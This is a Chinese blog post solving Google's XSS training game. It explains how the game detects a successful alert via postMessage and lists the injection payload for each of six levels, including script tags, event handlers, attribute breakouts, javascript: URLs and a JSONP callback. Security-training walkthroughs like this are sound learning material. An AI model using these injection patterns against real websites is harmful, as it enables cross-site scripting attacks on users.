有意思的遊戲:GoogleXSSGame
Google最近出了一個XSS的遊戲:
我這個菜鳥看提示,花了兩三個小時才全過了。。
這個遊戲的規則是隻要在攻擊網頁上彈出alert視窗就可以了。
題目頁面是在iframe裡巢狀的展現的,那麼父視窗是如何知道iframe裡成功彈出了視窗?
是這樣子實現的:
題目頁面載入了這個js,改寫了alert函式,當alert被呼叫時,向parent傳送一個訊息。
https://xss-game.appspot.com/static/game-frame.js
/* If we`re being iframed, let the parent know our URL */
/* Kids: don`t do this at home! */
parent.postMessage(window.location.toString(), "*");
/* Override window.alert */
var originalAlert = window.alert;
window.alert = function(s) {
parent.postMessage("success", "*");
setTimeout(function() {
originalAlert("Congratulations, you executed an alert:
"
+ s + "
You can now advance to the next level.");
}, 50);
}
然後父視窗註冊了一個EventListener來接收這個訊息:
https://xss-game.appspot.com/static/game.js
window.addEventListener("message", function(event) {
if (!window.location.origin) {
window.location.origin = window.location.protocol + "//"
+ window.location.hostname
+ (window.location.port ? `:` + window.location.port: ``);
}
if (event.origin == window.location.origin && event.data == "success") {
userOpenedAlert = true;
levelSolved();
return;
}
最下面是題目的答案。如果想自己玩遊戲的,慎拉下。
題目的答案:
Level1:
<script>alert(1)</script>
Level2:
<input onmouseover=”alert(1)”>
Level3:
https://xss-game.appspot.com/level3/frame#3.jpg` onload=”alert(1)”>
Level4:
3`);alert(`1
Level5:
https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert(1)
Level6:
重點是前面要有一個空格。
https://www.google.com/jsapi?callback=alert
遊戲過關之後,google給出了一個xss的文件:
https://www.google.com/about/appsecurity/learning/xss/index.html
相關文章
- 米就是力量!超有意思的種水稻遊戲《天穗之咲稻姬》遊戲
- 有意思!一個關於 Spring 歷史的線上小遊戲Spring遊戲
- 有意思、有趣的文字
- 有意思的clip-path
- 有意思的字串拘留實驗字串
- 兩個有意思的專案
- 前端非常有意思的小技巧前端
- 有意思!強大的 SVG 濾鏡SVG
- 分享一個有意思的錯誤
- 有意思、好用的免費API分享API
- MYSQL 主鍵的那些 “有意思” 故事MySql
- 有意思的前端函式面試題前端函式面試題
- 分享三個有意思的小程式
- 一些有意思的網站網站
- MySQL一個有意思的問題MySql
- 雷霆翟健:如果你特別重視資料,反而做不出有意思的遊戲遊戲
- 分享幾個有意思的陣列方法陣列
- 一份很有意思的 GC logGC
- 免費有意思的好用API推薦API
- 有意思的滑鼠指標互動探究指標
- 一個頗有意思的SQL語句SQL
- Mac上的有意思的快捷鍵(持續更新)Mac
- React Suite 做了一個有意思的決定ReactUI
- 一個有意思的CSS圖片hover效果CSS
- kill 程式時遇到的一件有意思的事情
- 一個很有意思的hook庫:react-hangerHookReact
- 一個很有意思的選擇表情DialogActivity
- 一道有意思的微信前端面試題前端面試題
- 一道有意思的面試演算法題面試演算法
- 有意思、好用、熱門的免費API推薦API
- 一道有意思的 CSS 面試題,FizzBuzz ~CSS面試題
- MySQL 有意思的浮點數和定點數MySql
- 分析一次有意思的需求——HTML程式碼注入HTML
- 新時代佈局中一些有意思的特性
- 有意思的JSON.parse()、JSON.stringify()JSON
- Java堆外快取(一個很有意思的應用)Java快取
- 軟體開發領域的10場有意思的對抗
- index 和 index_desc hints的一點有意思的區別Index